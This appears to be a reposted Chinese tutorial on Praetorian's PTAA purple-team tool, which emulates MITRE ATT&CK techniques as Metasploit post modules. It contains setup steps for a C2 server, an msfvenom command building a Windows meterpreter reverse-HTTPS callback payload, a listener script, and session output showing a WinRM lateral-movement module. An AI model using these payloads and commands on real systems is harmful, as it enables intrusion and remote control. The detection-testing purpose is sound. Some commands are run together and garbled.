今天就跟大家聊聊有關(guān)如何使用自動(dòng)化滲透測(cè)試工具PTAA,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結(jié)了以下內(nèi)容,希望大家根據(jù)這篇文章可以有所收獲。
旌陽(yáng)網(wǎng)站建設(shè)公司創(chuàng)新互聯(lián)建站,旌陽(yáng)網(wǎng)站設(shè)計(jì)制作,有大型網(wǎng)站制作公司豐富經(jīng)驗(yàn)。已為旌陽(yáng)超過(guò)千家提供企業(yè)網(wǎng)站建設(shè)服務(wù)。企業(yè)網(wǎng)站搭建\外貿(mào)網(wǎng)站制作要多少錢(qián),請(qǐng)找那個(gè)售后服務(wù)好的旌陽(yáng)做網(wǎng)站的公司定做!
為了評(píng)估安全檢測(cè)與事件響應(yīng)能力,我們正在嘗試尋找一種自動(dòng)化模擬對(duì)手攻擊策略的方式。通過(guò)研究,我們?cè)O(shè)計(jì)出了MITRE ATT&CK? TTPs,并以Metasploit Framework的模塊形式呈現(xiàn)-post模塊。目前,我們已經(jīng)可以自動(dòng)化模擬出超過(guò)100 種TTPs了。
Metasploit的優(yōu)勢(shì)就在于其穩(wěn)定健壯且豐富的功能庫(kù),該框架所帶的模塊能夠與操作系統(tǒng)API直接交互,而且靈活易于擴(kuò)展。除此之外,我們還可以利用Metasploit的execute_powershell模塊來(lái)模擬出類(lèi)似.NET內(nèi)存中執(zhí)行之類(lèi)的功能。這將允許藍(lán)隊(duì)確保他們的工具在檢測(cè)到特定TTP行為時(shí)能夠有效發(fā)出警報(bào),并不會(huì)執(zhí)行特定代碼或操作。(例如已編碼的PowerShell)
我們的工具基于最新版本的Metasploit開(kāi)發(fā)(2019年4月9日版:【Metasploit下載地址】)。在實(shí)現(xiàn)自動(dòng)化機(jī)制的過(guò)程中,我們盡可能地減少了對(duì)Metasploit框架源碼的修改量,以此來(lái)保證用戶(hù)能夠體驗(yàn)到接近原生的Metasploit。
C2服務(wù)器-注冊(cè)并搭建一臺(tái)云虛擬機(jī)設(shè)備
DNS-選擇一個(gè)域名并在DNS中注冊(cè)
SSL-我們建議大家使用有效的SSL證書(shū)來(lái)進(jìn)行測(cè)試操作,推薦使用LetsEncrypt:
exportDNS_NAME="mytestdomain.com" wgethttps://dl.eff.org/certbot-auto chmoda+x ./certbot-auto ./certbot-auto-q ./certbot-autocertonly -d $DNS_NAME --standalone --register-unsafely-without-email -n--agree-tos
安裝源:https://github.com/rapid7/metasploit-framework/tree/master/docker
安裝docker:
curl-fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add -
apt-keyfingerprint 0EBFCD88
add-apt-repository\
"deb [arch=amd64]https://download.docker.com/linux/debian jessie stable"
apt-get-y update
apt-get-y install docker-ce
獲取項(xiàng)目源碼:
git clone git@github.com:praetorian-inc/purple-team-attack-automation.git cd purple-team-attack-automation
修改LHOST以及對(duì)外端口:
echo"version: '3' services: ms: environment: # example of setting LHOST LHOST: 0.0.0.0 # example of adding more ports ports: - 8080:8080 - 443:443 - 80:80 "> docker-compose.local.override.yml
設(shè)置COMPOSE_FILE環(huán)境變量,加載本地文件:
echo"COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml">> .env
構(gòu)建容器:
docker -composebuild
運(yùn)行容器:
./docker/bin/msfconsole
修改metasploit目錄權(quán)限:
chmod-R ugo+rw ~/.msf4 Payload cd ~ curlhttps://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb> msfinstall && \ chmod 755 msfinstall && \ ./msfinstall msfvenom-p windows/x64/meterpreter_reverse_https lhost=mytestdomain.com lport=443 -ax64 -f exe HandlerSSLCert=~/purple-team-attack-automation/MSF.pemStagerVerifySSLCert=true -o ~/attack-testing.exe
你可以使用樣本資源腳本來(lái)開(kāi)啟監(jiān)聽(tīng)器:
$echo '<ruby> print_status("StartingHTTPS listener for Windows x64 meterpreter on port 443.") run_single("useexploit/multi/handler") run_single("setpayload windows/x64/meterpreter_reverse_https") run_single("setlport 443") run_single("setHandlerSSLCert MSF.pem") run_single("setExitOnSession false") run_single("setStagerVerifySSLCert true") run_single("exploit-j") </ruby>'> ~/purple-team-attack-automation/scripts/resource/windows_listener.rc
監(jiān)聽(tīng)器開(kāi)啟后,payload將以管理員權(quán)限運(yùn)行并發(fā)送回調(diào)信息。
msf5auxiliary(scanner/smb/impacket/secretsdump) > resource windows_listener.rc [*]Processing /usr/src/metasploit-framework/scripts/resource/windows_listener.rcfor ERB directives. [*]resource (/usr/src/metasploit-framework/scripts/resource/windows_listener.rc)>Ruby Code (270 bytes) [*]Starting HTTPS listener for Windows x64 meterpreter on port 443. payload=> windows/x64/meterpreter_reverse_https lport=> 443 lhost=> 0.0.0.0 [*]Exploit running as background job 0. [*]Exploit completed, but no session was created. msf5exploit(multi/handler) > [*]Started HTTPS reverse handler on https://0.0.0.0:443 [*]https://0.0.0.0:443 handling request from 192.168.137.11; (UUID: czgdxj3z)Redirecting stageless connection from/2F-7ig9OfztlUGRSOeTJogLC1HD_4Yf2RGj-ZlWaPE6oCIdO_nvk_GC913H-gXl7lhXUXYcn withUA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko' [*]https://0.0.0.0:443 handling request from 192.168.137.11; (UUID: czgdxj3z)Attaching orphaned/stageless session... [*]Meterpreter session 1 opened (172.18.0.3:443 -> 192.168.137.11:52012) at2019-04-15 16:10:27 +0000 msf5post(windows/purple/t1005) > use post/windows/purple/t1028 msf5post(windows/purple/t1028) > info Name: Windows Remote Management (T1028)Windows - Purple Team Module: post/windows/purple/t1028 Platform: Windows Arch: Rank: Normal Providedby: Praetorian Compatiblesession types: Meterpreter Basicoptions: Name Current Setting Required Description ---- --------------- -------- ----------- CLEANUP true yes Close any instances ofcalc CMD winrm qc -q & winrm i c wmicimv2/Win32_Process@{CommandLine="calc"} yes Command to execute SESSION 1 yes The session to run thismodule on. Description: Execution, Lateral Movement: Windows RemoteManagement (WinRM) is the name of both a Windows service and aprotocol that allows a user to interact with a remote system (e.g., runan executable, modify the Registry, modify services). It may becalled with the winrm command or by any number of programs such asPowerShell. References: CVE: Not available https://attack.mitre.org/wiki/Technique/T1028 msf5post(windows/purple/t1028) > exploit [+]Found an instance of Calculator running. Killing it. [*]Executing 'cmd /c winrm qc -q & winrm i c wmicimv2/Win32_Process@{CommandLine="calc"}' on #<Session:meterpreter192.168.137.11:52012 (10.0.2.15) "PURPLEDEV\Administrator @DESKTOP-1"> [!]WinRM service is already running on this machine. WSManFault Message ProviderFault WSManFault Message = WinRM firewall exceptionwill not work since one of the network connection types on this machine is setto Public. Change the network connection type to either Domain or Private andtry again. Errornumber: -2144108183 0x80338169 WinRMfirewall exception will not work since one of the network connection types onthis machine is set to Public. Change the network connection type to eitherDomain or Private and try again. create_OUTPUT ProcessId = 5456 ReturnValue = 0 [+]Module T1028W execution successful. [+]Found an instance of Calculator running. Killing it. [+]Found an instance of Calculator running. Killing it. [*]Post module execution completed msf5post(windows/purple/t1028) >
看完上述內(nèi)容,你們對(duì)如何使用自動(dòng)化滲透測(cè)試工具PTAA有進(jìn)一步的了解嗎?如果還想了解更多知識(shí)或者相關(guān)內(nèi)容,請(qǐng)關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道,感謝大家的支持。
分享標(biāo)題:如何使用自動(dòng)化滲透測(cè)試工具PTAA
URL分享:http://bm7419.com/article6/psdiig.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供服務(wù)器托管、網(wǎng)站制作、品牌網(wǎng)站建設(shè)、網(wǎng)站策劃、搜索引擎優(yōu)化、域名注冊(cè)
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶(hù)投稿、用戶(hù)轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀(guān)點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話(huà):028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)
移動(dòng)網(wǎng)站建設(shè)知識(shí)